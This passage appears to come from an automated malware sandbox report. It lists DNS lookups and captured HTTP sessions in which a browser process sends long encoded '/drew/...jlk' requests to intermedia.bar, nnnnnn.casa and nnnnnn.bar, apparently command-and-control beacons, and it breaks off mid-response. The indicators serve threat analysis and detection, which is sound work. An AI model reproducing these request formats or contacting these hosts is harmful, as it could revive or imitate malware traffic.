                  Jan 21, 2022 07:53:23.956944942 CET8.8.8.8192.168.2.30xd103No error (0)parkingpage.namecheap.com198.54.117.212A (IP address)IN (0x0001)
                  Jan 21, 2022 07:53:23.956944942 CET8.8.8.8192.168.2.30xd103No error (0)parkingpage.namecheap.com198.54.117.215A (IP address)IN (0x0001)
                  Jan 21, 2022 07:53:23.956944942 CET8.8.8.8192.168.2.30xd103No error (0)parkingpage.namecheap.com198.54.117.216A (IP address)IN (0x0001)
                  Jan 21, 2022 07:53:51.791054010 CET8.8.8.8192.168.2.30xfbe3No error (0)intermedia.bar31.41.46.120A (IP address)IN (0x0001)
                  Jan 21, 2022 07:53:53.036653996 CET8.8.8.8192.168.2.30x7978No error (0)intermedia.bar31.41.46.120A (IP address)IN (0x0001)
                  Jan 21, 2022 07:53:53.045314074 CET8.8.8.8192.168.2.30x665bNo error (0)intermedia.bar31.41.46.120A (IP address)IN (0x0001)
                  Jan 21, 2022 07:53:53.069173098 CET8.8.8.8192.168.2.30x7d04No error (0)intermedia.bar31.41.46.120A (IP address)IN (0x0001)
                  Jan 21, 2022 07:54:16.180954933 CET8.8.8.8192.168.2.30xbebbNo error (0)nnnnnn.bar162.255.119.177A (IP address)IN (0x0001)
                  Jan 21, 2022 07:54:19.784967899 CET8.8.8.8192.168.2.30x946No error (0)www.nnnnnn.barparkingpage.namecheap.comCNAME (Canonical name)IN (0x0001)
                  Jan 21, 2022 07:54:19.784967899 CET8.8.8.8192.168.2.30x946No error (0)parkingpage.namecheap.com198.54.117.216A (IP address)IN (0x0001)
                  Jan 21, 2022 07:54:19.784967899 CET8.8.8.8192.168.2.30x946No error (0)parkingpage.namecheap.com198.54.117.217A (IP address)IN (0x0001)
                  Jan 21, 2022 07:54:19.784967899 CET8.8.8.8192.168.2.30x946No error (0)parkingpage.namecheap.com198.54.117.212A (IP address)IN (0x0001)
                  Jan 21, 2022 07:54:19.784967899 CET8.8.8.8192.168.2.30x946No error (0)parkingpage.namecheap.com198.54.117.210A (IP address)IN (0x0001)
                  Jan 21, 2022 07:54:19.784967899 CET8.8.8.8192.168.2.30x946No error (0)parkingpage.namecheap.com198.54.117.211A (IP address)IN (0x0001)
                  Jan 21, 2022 07:54:19.784967899 CET8.8.8.8192.168.2.30x946No error (0)parkingpage.namecheap.com198.54.117.218A (IP address)IN (0x0001)
                  Jan 21, 2022 07:54:19.784967899 CET8.8.8.8192.168.2.30x946No error (0)parkingpage.namecheap.com198.54.117.215A (IP address)IN (0x0001)
                  Jan 21, 2022 07:54:21.367357969 CET8.8.8.8192.168.2.30xdd79No error (0)nnnnnn.bar162.255.119.177A (IP address)IN (0x0001)
                  Jan 21, 2022 07:54:21.389899015 CET8.8.8.8192.168.2.30x50bbNo error (0)nnnnnn.bar162.255.119.177A (IP address)IN (0x0001)
                  Jan 21, 2022 07:54:21.405597925 CET8.8.8.8192.168.2.30x730cNo error (0)nnnnnn.bar162.255.119.177A (IP address)IN (0x0001)
                  Jan 21, 2022 07:54:24.313271046 CET8.8.8.8192.168.2.30xb57fNo error (0)www.nnnnnn.barparkingpage.namecheap.comCNAME (Canonical name)IN (0x0001)
                  Jan 21, 2022 07:54:24.313271046 CET8.8.8.8192.168.2.30xb57fNo error (0)parkingpage.namecheap.com198.54.117.211A (IP address)IN (0x0001)
                  Jan 21, 2022 07:54:24.313271046 CET8.8.8.8192.168.2.30xb57fNo error (0)parkingpage.namecheap.com198.54.117.210A (IP address)IN (0x0001)
                  Jan 21, 2022 07:54:24.313271046 CET8.8.8.8192.168.2.30xb57fNo error (0)parkingpage.namecheap.com198.54.117.212A (IP address)IN (0x0001)
                  Jan 21, 2022 07:54:24.313271046 CET8.8.8.8192.168.2.30xb57fNo error (0)parkingpage.namecheap.com198.54.117.217A (IP address)IN (0x0001)
                  Jan 21, 2022 07:54:24.313271046 CET8.8.8.8192.168.2.30xb57fNo error (0)parkingpage.namecheap.com198.54.117.218A (IP address)IN (0x0001)
                  Jan 21, 2022 07:54:24.313271046 CET8.8.8.8192.168.2.30xb57fNo error (0)parkingpage.namecheap.com198.54.117.216A (IP address)IN (0x0001)
                  Jan 21, 2022 07:54:24.313271046 CET8.8.8.8192.168.2.30xb57fNo error (0)parkingpage.namecheap.com198.54.117.215A (IP address)IN (0x0001)
                  Jan 21, 2022 07:54:43.993266106 CET8.8.8.8192.168.2.30x9f6bNo error (0)nnnnnn.casa192.64.119.233A (IP address)IN (0x0001)
                  Jan 21, 2022 07:54:47.093403101 CET8.8.8.8192.168.2.30xcaacNo error (0)www.nnnnnn.casaparkingpage.namecheap.comCNAME (Canonical name)IN (0x0001)
                  Jan 21, 2022 07:54:47.093403101 CET8.8.8.8192.168.2.30xcaacNo error (0)parkingpage.namecheap.com198.54.117.212A (IP address)IN (0x0001)
                  Jan 21, 2022 07:54:47.093403101 CET8.8.8.8192.168.2.30xcaacNo error (0)parkingpage.namecheap.com198.54.117.215A (IP address)IN (0x0001)
                  Jan 21, 2022 07:54:47.093403101 CET8.8.8.8192.168.2.30xcaacNo error (0)parkingpage.namecheap.com198.54.117.217A (IP address)IN (0x0001)
                  Jan 21, 2022 07:54:47.093403101 CET8.8.8.8192.168.2.30xcaacNo error (0)parkingpage.namecheap.com198.54.117.218A (IP address)IN (0x0001)
                  Jan 21, 2022 07:54:47.093403101 CET8.8.8.8192.168.2.30xcaacNo error (0)parkingpage.namecheap.com198.54.117.216A (IP address)IN (0x0001)
                  Jan 21, 2022 07:54:47.093403101 CET8.8.8.8192.168.2.30xcaacNo error (0)parkingpage.namecheap.com198.54.117.211A (IP address)IN (0x0001)
                  Jan 21, 2022 07:54:47.093403101 CET8.8.8.8192.168.2.30xcaacNo error (0)parkingpage.namecheap.com198.54.117.210A (IP address)IN (0x0001)
                  Jan 21, 2022 07:54:47.464580059 CET8.8.8.8192.168.2.30x37e1No error (0)nnnnnn.casa192.64.119.233A (IP address)IN (0x0001)
                  Jan 21, 2022 07:54:49.862381935 CET8.8.8.8192.168.2.30xf154No error (0)www.nnnnnn.casaparkingpage.namecheap.comCNAME (Canonical name)IN (0x0001)
                  Jan 21, 2022 07:54:49.862381935 CET8.8.8.8192.168.2.30xf154No error (0)parkingpage.namecheap.com198.54.117.215A (IP address)IN (0x0001)
                  Jan 21, 2022 07:54:49.862381935 CET8.8.8.8192.168.2.30xf154No error (0)parkingpage.namecheap.com198.54.117.217A (IP address)IN (0x0001)
                  Jan 21, 2022 07:54:49.862381935 CET8.8.8.8192.168.2.30xf154No error (0)parkingpage.namecheap.com198.54.117.216A (IP address)IN (0x0001)
                  Jan 21, 2022 07:54:49.862381935 CET8.8.8.8192.168.2.30xf154No error (0)parkingpage.namecheap.com198.54.117.218A (IP address)IN (0x0001)
                  Jan 21, 2022 07:54:49.862381935 CET8.8.8.8192.168.2.30xf154No error (0)parkingpage.namecheap.com198.54.117.212A (IP address)IN (0x0001)
                  Jan 21, 2022 07:54:49.862381935 CET8.8.8.8192.168.2.30xf154No error (0)parkingpage.namecheap.com198.54.117.210A (IP address)IN (0x0001)
                  Jan 21, 2022 07:54:49.862381935 CET8.8.8.8192.168.2.30xf154No error (0)parkingpage.namecheap.com198.54.117.211A (IP address)IN (0x0001)
                  Jan 21, 2022 07:55:07.519746065 CET8.8.8.8192.168.2.30xe76cNo error (0)intermedia.bar31.41.46.120A (IP address)IN (0x0001)
                  Jan 21, 2022 07:55:10.306759119 CET8.8.8.8192.168.2.30x35b1No error (0)intermedia.bar31.41.46.120A (IP address)IN (0x0001)
                  Jan 21, 2022 07:55:18.808697939 CET8.8.8.8192.168.2.30xe7d2No error (0)nnnnnn.casa192.64.119.233A (IP address)IN (0x0001)
                  Jan 21, 2022 07:55:19.131164074 CET8.8.8.8192.168.2.30x5cd7No error (0)nnnnnn.casa192.64.119.233A (IP address)IN (0x0001)
                  Jan 21, 2022 07:55:19.172622919 CET8.8.8.8192.168.2.30xa9cdNo error (0)www.nnnnnn.casaparkingpage.namecheap.comCNAME (Canonical name)IN (0x0001)
                  Jan 21, 2022 07:55:19.172622919 CET8.8.8.8192.168.2.30xa9cdNo error (0)parkingpage.namecheap.com198.54.117.210A (IP address)IN (0x0001)
                  Jan 21, 2022 07:55:19.172622919 CET8.8.8.8192.168.2.30xa9cdNo error (0)parkingpage.namecheap.com198.54.117.218A (IP address)IN (0x0001)
                  Jan 21, 2022 07:55:19.172622919 CET8.8.8.8192.168.2.30xa9cdNo error (0)parkingpage.namecheap.com198.54.117.216A (IP address)IN (0x0001)
                  Jan 21, 2022 07:55:19.172622919 CET8.8.8.8192.168.2.30xa9cdNo error (0)parkingpage.namecheap.com198.54.117.215A (IP address)IN (0x0001)
                  Jan 21, 2022 07:55:19.172622919 CET8.8.8.8192.168.2.30xa9cdNo error (0)parkingpage.namecheap.com198.54.117.211A (IP address)IN (0x0001)
                  Jan 21, 2022 07:55:19.172622919 CET8.8.8.8192.168.2.30xa9cdNo error (0)parkingpage.namecheap.com198.54.117.212A (IP address)IN (0x0001)
                  Jan 21, 2022 07:55:19.172622919 CET8.8.8.8192.168.2.30xa9cdNo error (0)parkingpage.namecheap.com198.54.117.217A (IP address)IN (0x0001)
                  Jan 21, 2022 07:55:19.491530895 CET8.8.8.8192.168.2.30x7631No error (0)www.nnnnnn.casaparkingpage.namecheap.comCNAME (Canonical name)IN (0x0001)
                  Jan 21, 2022 07:55:19.491530895 CET8.8.8.8192.168.2.30x7631No error (0)parkingpage.namecheap.com198.54.117.216A (IP address)IN (0x0001)
                  Jan 21, 2022 07:55:19.491530895 CET8.8.8.8192.168.2.30x7631No error (0)parkingpage.namecheap.com198.54.117.210A (IP address)IN (0x0001)
                  Jan 21, 2022 07:55:19.491530895 CET8.8.8.8192.168.2.30x7631No error (0)parkingpage.namecheap.com198.54.117.211A (IP address)IN (0x0001)
                  Jan 21, 2022 07:55:19.491530895 CET8.8.8.8192.168.2.30x7631No error (0)parkingpage.namecheap.com198.54.117.217A (IP address)IN (0x0001)
                  Jan 21, 2022 07:55:19.491530895 CET8.8.8.8192.168.2.30x7631No error (0)parkingpage.namecheap.com198.54.117.218A (IP address)IN (0x0001)
                  Jan 21, 2022 07:55:19.491530895 CET8.8.8.8192.168.2.30x7631No error (0)parkingpage.namecheap.com198.54.117.212A (IP address)IN (0x0001)
                  Jan 21, 2022 07:55:19.491530895 CET8.8.8.8192.168.2.30x7631No error (0)parkingpage.namecheap.com198.54.117.215A (IP address)IN (0x0001)
                  Jan 21, 2022 07:55:27.767707109 CET8.8.8.8192.168.2.30xa700No error (0)nnnnnn.bar162.255.119.177A (IP address)IN (0x0001)
                  Jan 21, 2022 07:55:30.529737949 CET8.8.8.8192.168.2.30x1ddaNo error (0)nnnnnn.bar162.255.119.177A (IP address)IN (0x0001)
                  Jan 21, 2022 07:55:39.584458113 CET8.8.8.8192.168.2.30xc787No error (0)intermedia.bar31.41.46.120A (IP address)IN (0x0001)
                  Jan 21, 2022 07:55:39.996416092 CET8.8.8.8192.168.2.30x5086No error (0)intermedia.bar31.41.46.120A (IP address)IN (0x0001)
                  Jan 21, 2022 07:55:59.791659117 CET8.8.8.8192.168.2.30xd45dNo error (0)nnnnnn.bar162.255.119.177A (IP address)IN (0x0001)
                  Jan 21, 2022 07:56:00.223572969 CET8.8.8.8192.168.2.30xa3b2No error (0)nnnnnn.bar162.255.119.177A (IP address)IN (0x0001)

                  HTTP Request Dependency Graph

                  • intermedia.bar
                  • nnnnnn.casa
                  • www.nnnnnn.casa
                  • nnnnnn.bar
                  • www.nnnnnn.bar

                  HTTP Packets

                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  0192.168.2.34974431.41.46.12080C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  TimestampkBytes transferredDirectionData
                  Jan 21, 2022 07:52:31.631772995 CET1133OUTGET /drew/AHuA6TotyEkgE/zVHP4orW/8ZyPY4kye4oTIP7K7spF8Z9/AzQVZQntBp/tPbfiBhZz1jY6V1X4/X3paMFGt7Rtb/Gt0dLluCvH5/isi1V1iV9bVleO/ZSGFxB9026a2AgTqikOVK/u0I_2FkyTPhzae4E/1G0e1neGkHRRAKR/dF6sfHEo8IqgOHnhhJ/mLAA5W_2B/LYdzOxqVD56rhjE9w2zj/4EWbKl1xgm4daCyR1mC/ReRKxfnNjlWG/r.jlk HTTP/1.1
                  Accept: text/html, application/xhtml+xml, image/jxr, */*
                  Accept-Language: en-US
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                  Accept-Encoding: gzip, deflate
                  Host: intermedia.bar
                  Connection: Keep-Alive


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  1192.168.2.34974531.41.46.12080C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  TimestampkBytes transferredDirectionData
                  Jan 21, 2022 07:52:31.707668066 CET1134OUTGET /drew/AHuA6TotyEkgE/zVHP4orW/8ZyPY4kye4oTIP7K7spF8Z9/AzQVZQntBp/tPbfiBhZz1jY6V1X4/X3paMFGt7Rtb/Gt0dLluCvH5/isi1V1iV9bVleO/ZSGFxB9026a2AgTqikOVK/u0I_2FkyTPhzae4E/1G0e1neGkHRRAKR/dF6sfHEo8IqgOHnhhJ/mLAA5W_2B/LYdzOxqVD56rhjE9w2zj/4EWbKl1xgm4daCyR1mC/ReRKxfnNjlWG/r.jlk HTTP/1.1
                  Accept: text/html, application/xhtml+xml, image/jxr, */*
                  Accept-Language: en-US
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                  Accept-Encoding: gzip, deflate
                  Host: intermedia.bar
                  Connection: Keep-Alive


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  10192.168.2.34975431.41.46.12080C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  TimestampkBytes transferredDirectionData
                  Jan 21, 2022 07:52:33.224863052 CET1144OUTGET /drew/XRuGSIvrh83QGTYBTk/D9D3Vm19e/d5qtxwnIReenmX0dL_2F/z8AEjIs12VaPeEM7Fev/sHz_2Bx6bKLjtUULCEG0oV/GFai8cinvXLi4/iJJ7udwg/w0syzQHw_2FkzljAekHpIIx/DRVmfhCAjc/ZkwIrTh7UfbfcJWEg/EIPSCrhxM6nj/j9uYJZXC8_2/F6Btih0QBETHvA/LKTtsUnIUQHLFxaNR0li7/dM04PASCBbiQz0aa/qK64_2Bg_2B/VwE.jlk HTTP/1.1
                  Accept: text/html, application/xhtml+xml, image/jxr, */*
                  Accept-Language: en-US
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                  Accept-Encoding: gzip, deflate
                  Host: intermedia.bar
                  Connection: Keep-Alive


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  11192.168.2.34975931.41.46.12080C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  TimestampkBytes transferredDirectionData
                  Jan 21, 2022 07:52:33.373172998 CET1146OUTGET /drew/XRuGSIvrh83QGTYBTk/D9D3Vm19e/d5qtxwnIReenmX0dL_2F/z8AEjIs12VaPeEM7Fev/sHz_2Bx6bKLjtUULCEG0oV/GFai8cinvXLi4/iJJ7udwg/w0syzQHw_2FkzljAekHpIIx/DRVmfhCAjc/ZkwIrTh7UfbfcJWEg/EIPSCrhxM6nj/j9uYJZXC8_2/F6Btih0QBETHvA/LKTtsUnIUQHLFxaNR0li7/dM04PASCBbiQz0aa/qK64_2Bg_2B/VwE.jlk HTTP/1.1
                  Accept: text/html, application/xhtml+xml, image/jxr, */*
                  Accept-Language: en-US
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                  Accept-Encoding: gzip, deflate
                  Host: intermedia.bar
                  Connection: Keep-Alive


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  12192.168.2.349798192.64.119.23380C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  TimestampkBytes transferredDirectionData
                  Jan 21, 2022 07:53:19.287817955 CET1869OUTGET /drew/_2B03VnehjE70sxbkc/jyrt4kETn/GIT8yZh3IbCxiT_2Foqi/AVmT8sl3RBATNe233tn/ZpXwd5tIp9mQUoOfWLynTM/O86glIn9ihyHk/5dZsFtfy/gp_2FLvf0NHL3yVUkVbncwC/We6V8shIxB/_2BT5Ij9nSjAjmHue/61Ynbzrr_2B_/2FOk8Wface5/lcJD0_2FBb9PKs/3pUPEuZF5gHL68StfaFm9/KhGw_2FEloE_2FaF/OCoSTxCMO1I6oVZ/G3ADi.jlk HTTP/1.1
                  Accept: text/html, application/xhtml+xml, image/jxr, */*
                  Accept-Language: en-US
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                  Accept-Encoding: gzip, deflate
                  Host: nnnnnn.casa
                  Connection: Keep-Alive
                  Jan 21, 2022 07:53:22.050024986 CET1894INHTTP/1.1 302 Found
                  Server: nginx
                  Date: Fri, 21 Jan 2022 06:53:21 GMT
                  Content-Type: text/html; charset=utf-8
                  Content-Length: 324
                  Connection: keep-alive
                  Location: http://www.nnnnnn.casa/drew/_2B03VnehjE70sxbkc/jyrt4kETn/GIT8yZh3IbCxiT_2Foqi/AVmT8sl3RBATNe233tn/ZpXwd5tIp9mQUoOfWLynTM/O86glIn9ihyHk/5dZsFtfy/gp_2FLvf0NHL3yVUkVbncwC/We6V8shIxB/_2BT5Ij9nSjAjmHue/61Ynbzrr_2B_/2FOk8Wface5/lcJD0_2FBb9PKs/3pUPEuZF5gHL68StfaFm9/KhGw_2FEloE_2FaF/OCoSTxCMO1I6oVZ/G3ADi.jlk
                  X-Served-By: Namecheap URL Forward
                  Data Raw: 3c 61 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 77 77 77 2e 6e 6e 6e 6e 6e 6e 2e 63 61 73 61 2f 64 72 65 77 2f 5f 32 42 30 33 56 6e 65 68 6a 45 37 30 73 78 62 6b 63 2f 6a 79 72 74 34 6b 45 54 6e 2f 47 49 54 38 79 5a 68 33 49 62 43 78 69 54 5f 32 46 6f 71 69 2f 41 56 6d 54 38 73 6c 33 52 42 41 54 4e 65 32 33 33 74 6e 2f 5a 70 58 77 64 35 74 49 70 39 6d 51 55 6f 4f 66 57 4c 79 6e 54 4d 2f 4f 38 36 67 6c 49 6e 39 69 68 79 48 6b 2f 35 64 5a 73 46 74 66 79 2f 67 70 5f 32 46 4c 76 66 30 4e 48 4c 33 79 56 55 6b 56 62 6e 63 77 43 2f 57 65 36 56 38 73 68 49 78 42 2f 5f 32 42 54 35 49 6a 39 6e 53 6a 41 6a 6d 48 75 65 2f 36 31 59 6e 62 7a 72 72 5f 32 42 5f 2f 32 46 4f 6b 38 57 66 61 63 65 35 2f 6c 63 4a 44 30 5f 32 46 42 62 39 50 4b 73 2f 33 70 55 50 45 75 5a 46 35 67 48 4c 36 38 53 74 66 61 46 6d 39 2f 4b 68 47 77 5f 32 46 45 6c 6f 45 5f 32 46 61 46 2f 4f 43 6f 53 54 78 43 4d 4f 31 49 36 6f 56 5a 2f 47 33 41 44 69 2e 6a 6c 6b 27 3e 46 6f 75 6e 64 3c 2f 61 3e 2e 0a 0a
                  Data Ascii: <a href='http://www.nnnnnn.casa/drew/_2B03VnehjE70sxbkc/jyrt4kETn/GIT8yZh3IbCxiT_2Foqi/AVmT8sl3RBATNe233tn/ZpXwd5tIp9mQUoOfWLynTM/O86glIn9ihyHk/5dZsFtfy/gp_2FLvf0NHL3yVUkVbncwC/We6V8shIxB/_2BT5Ij9nSjAjmHue/61Ynbzrr_2B_/2FOk8Wface5/lcJD0_2FBb9PKs/3pUPEuZF5gHL68StfaFm9/KhGw_2FEloE_2FaF/OCoSTxCMO1I6oVZ/G3ADi.jlk'>Found</a>.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  13192.168.2.349801192.64.119.23380C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  TimestampkBytes transferredDirectionData
                  Jan 21, 2022 07:53:20.714209080 CET1870OUTGET /drew/CC6vFhlW/UuVttcLu_2BA_2FHtMOxPk2/p06phiAIxA/gjdrBk68bYot5XSac/3ntrXmBRPVVJ/FuVIEN7_2Fo/aCnj_2FmBhObAK/8aP2AGVPAOybsQywMs_2B/E7LrnE42ALU_2Fwo/mL9Qj0_2B7r7nQz/aXlT6k2ThGhFMeZNO0/C87T1WAh3/OF6zkGz8oPN1AcA9PsPW/m4gDLcKkqegQQkIsQ30/5rDEv5BBA0O3c2DxTO5H5u/dBzGm_2Bv0iek/Yq2.jlk HTTP/1.1
                  Accept: text/html, application/xhtml+xml, image/jxr, */*
                  Accept-Language: en-US
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                  Accept-Encoding: gzip, deflate
                  Host: nnnnnn.casa
                  Connection: Keep-Alive
                  Jan 21, 2022 07:53:23.919502974 CET10767INHTTP/1.1 302 Found
                  Server: nginx
                  Date: Fri, 21 Jan 2022 06:53:23 GMT
                  Content-Type: text/html; charset=utf-8
                  Content-Length: 322
                  Connection: keep-alive
                  Location: http://www.nnnnnn.casa/drew/CC6vFhlW/UuVttcLu_2BA_2FHtMOxPk2/p06phiAIxA/gjdrBk68bYot5XSac/3ntrXmBRPVVJ/FuVIEN7_2Fo/aCnj_2FmBhObAK/8aP2AGVPAOybsQywMs_2B/E7LrnE42ALU_2Fwo/mL9Qj0_2B7r7nQz/aXlT6k2ThGhFMeZNO0/C87T1WAh3/OF6zkGz8oPN1AcA9PsPW/m4gDLcKkqegQQkIsQ30/5rDEv5BBA0O3c2DxTO5H5u/dBzGm_2Bv0iek/Yq2.jlk
                  X-Served-By: Namecheap URL Forward
                  Data Raw: 3c 61 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 77 77 77 2e 6e 6e 6e 6e 6e 6e 2e 63 61 73 61 2f 64 72 65 77 2f 43 43 36 76 46 68 6c 57 2f 55 75 56 74 74 63 4c 75 5f 32 42 41 5f 32 46 48 74 4d 4f 78 50 6b 32 2f 70 30 36 70 68 69 41 49 78 41 2f 67 6a 64 72 42 6b 36 38 62 59 6f 74 35 58 53 61 63 2f 33 6e 74 72 58 6d 42 52 50 56 56 4a 2f 46 75 56 49 45 4e 37 5f 32 46 6f 2f 61 43 6e 6a 5f 32 46 6d 42 68 4f 62 41 4b 2f 38 61 50 32 41 47 56 50 41 4f 79 62 73 51 79 77 4d 73 5f 32 42 2f 45 37 4c 72 6e 45 34 32 41 4c 55 5f 32 46 77 6f 2f 6d 4c 39 51 6a 30 5f 32 42 37 72 37 6e 51 7a 2f 61 58 6c 54 36 6b 32 54 68 47 68 46 4d 65 5a 4e 4f 30 2f 43 38 37 54 31 57 41 68 33 2f 4f 46 36 7a 6b 47 7a 38 6f 50 4e 31 41 63 41 39 50 73 50 57 2f 6d 34 67 44 4c 63 4b 6b 71 65 67 51 51 6b 49 73 51 33 30 2f 35 72 44 45 76 35 42 42 41 30 4f 33 63 32 44 78 54 4f 35 48 35 75 2f 64 42 7a 47 6d 5f 32 42 76 30 69 65 6b 2f 59 71 32 2e 6a 6c 6b 27 3e 46 6f 75 6e 64 3c 2f 61 3e 2e 0a 0a
                  Data Ascii: <a href='http://www.nnnnnn.casa/drew/CC6vFhlW/UuVttcLu_2BA_2FHtMOxPk2/p06phiAIxA/gjdrBk68bYot5XSac/3ntrXmBRPVVJ/FuVIEN7_2Fo/aCnj_2FmBhObAK/8aP2AGVPAOybsQywMs_2B/E7LrnE42ALU_2Fwo/mL9Qj0_2B7r7nQz/aXlT6k2ThGhFMeZNO0/C87T1WAh3/OF6zkGz8oPN1AcA9PsPW/m4gDLcKkqegQQkIsQ30/5rDEv5BBA0O3c2DxTO5H5u/dBzGm_2Bv0iek/Yq2.jlk'>Found</a>.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  14192.168.2.349802192.64.119.23380C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  TimestampkBytes transferredDirectionData
                  Jan 21, 2022 07:53:20.722321987 CET1871OUTGET /drew/y8OOHzBXx4vT2Ja_/2BB0Liu_2F2FEpI/O7IlC7aNtEnJlyf21V/jvmc9z_2B/LgRR93FX60U2LAF0LNi_/2F_2BGce3vI_2BIkboe/46Qz18Ellyo_2BDKCHtUqk/Qk_2BAks18SnJ/U_2FwSgO/sE9Mmm7pd7FF8XBf_2Beleh/BwXJLGguic/wUEaBBM2DtBJsDeIK/yJJJ44VcWEyj/YNrlDdUaDHH/B2K_2BaEwy92zT/APjxiknoaFgUNKS3zmK7O/E1iKLdia/f.jlk HTTP/1.1
                  Accept: text/html, application/xhtml+xml, image/jxr, */*
                  Accept-Language: en-US
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                  Accept-Encoding: gzip, deflate
                  Host: nnnnnn.casa
                  Connection: Keep-Alive
                  Jan 21, 2022 07:53:22.071861982 CET1895INHTTP/1.1 302 Found
                  Server: nginx
                  Date: Fri, 21 Jan 2022 06:53:21 GMT
                  Content-Type: text/html; charset=utf-8
                  Content-Length: 329
                  Connection: keep-alive
                  Location: http://www.nnnnnn.casa/drew/y8OOHzBXx4vT2Ja_/2BB0Liu_2F2FEpI/O7IlC7aNtEnJlyf21V/jvmc9z_2B/LgRR93FX60U2LAF0LNi_/2F_2BGce3vI_2BIkboe/46Qz18Ellyo_2BDKCHtUqk/Qk_2BAks18SnJ/U_2FwSgO/sE9Mmm7pd7FF8XBf_2Beleh/BwXJLGguic/wUEaBBM2DtBJsDeIK/yJJJ44VcWEyj/YNrlDdUaDHH/B2K_2BaEwy92zT/APjxiknoaFgUNKS3zmK7O/E1iKLdia/f.jlk
                  X-Served-By: Namecheap URL Forward
                  Data Raw: 3c 61 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 77 77 77 2e 6e 6e 6e 6e 6e 6e 2e 63 61 73 61 2f 64 72 65 77 2f 79 38 4f 4f 48 7a 42 58 78 34 76 54 32 4a 61 5f 2f 32 42 42 30 4c 69 75 5f 32 46 32 46 45 70 49 2f 4f 37 49 6c 43 37 61 4e 74 45 6e 4a 6c 79 66 32 31 56 2f 6a 76 6d 63 39 7a 5f 32 42 2f 4c 67 52 52 39 33 46 58 36 30 55 32 4c 41 46 30 4c 4e 69 5f 2f 32 46 5f 32 42 47 63 65 33 76 49 5f 32 42 49 6b 62 6f 65 2f 34 36 51 7a 31 38 45 6c 6c 79 6f 5f 32 42 44 4b 43 48 74 55 71 6b 2f 51 6b 5f 32 42 41 6b 73 31 38 53 6e 4a 2f 55 5f 32 46 77 53 67 4f 2f 73 45 39 4d 6d 6d 37 70 64 37 46 46 38 58 42 66 5f 32 42 65 6c 65 68 2f 42 77 58 4a 4c 47 67 75 69 63 2f 77 55 45 61 42 42 4d 32 44 74 42 4a 73 44 65 49 4b 2f 79 4a 4a 4a 34 34 56 63 57 45 79 6a 2f 59 4e 72 6c 44 64 55 61 44 48 48 2f 42 32 4b 5f 32 42 61 45 77 79 39 32 7a 54 2f 41 50 6a 78 69 6b 6e 6f 61 46 67 55 4e 4b 53 33 7a 6d 4b 37 4f 2f 45 31 69 4b 4c 64 69 61 2f 66 2e 6a 6c 6b 27 3e 46 6f 75 6e 64 3c 2f 61 3e 2e 0a 0a
                  Data Ascii: <a href='http://www.nnnnnn.casa/drew/y8OOHzBXx4vT2Ja_/2BB0Liu_2F2FEpI/O7IlC7aNtEnJlyf21V/jvmc9z_2B/LgRR93FX60U2LAF0LNi_/2F_2BGce3vI_2BIkboe/46Qz18Ellyo_2BDKCHtUqk/Qk_2BAks18SnJ/U_2FwSgO/sE9Mmm7pd7FF8XBf_2Beleh/BwXJLGguic/wUEaBBM2DtBJsDeIK/yJJJ44VcWEyj/YNrlDdUaDHH/B2K_2BaEwy92zT/APjxiknoaFgUNKS3zmK7O/E1iKLdia/f.jlk'>Found</a>.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  15192.168.2.349804192.64.119.23380C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  TimestampkBytes transferredDirectionData
                  Jan 21, 2022 07:53:21.753691912 CET1872OUTGET /drew/cfAdMgmKkin/IKg5kEzUc7O41G/1aJXhaeTcJcKRLHZeVFTR/YESrHc56nHRZVmx4/tYxP0kNt3J09QeX/igdVtxPOUp_2BOV3T1/l9vZu0Xwc/FM_2BB5MarAEMPcAjB1q/MZjYfvc_2FNkAc9icJ8/HZjCPWDoPewJNdLsqIF4PP/luDIFMdUdOiq4/6JYVx7X5/TcpnV0hN0Uxsa0bM5ELNrvr/xkYBmwG0ma/H_2FKJLgQ2JFGX6Xc/bFNqbQR.jlk HTTP/1.1
                  Accept: text/html, application/xhtml+xml, image/jxr, */*
                  Accept-Language: en-US
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                  Accept-Encoding: gzip, deflate
                  Host: nnnnnn.casa
                  Connection: Keep-Alive
                  Jan 21, 2022 07:53:23.926692963 CET10768INHTTP/1.1 302 Found
                  Server: nginx
                  Date: Fri, 21 Jan 2022 06:53:23 GMT
                  Content-Type: text/html; charset=utf-8
                  Content-Length: 313
                  Connection: keep-alive
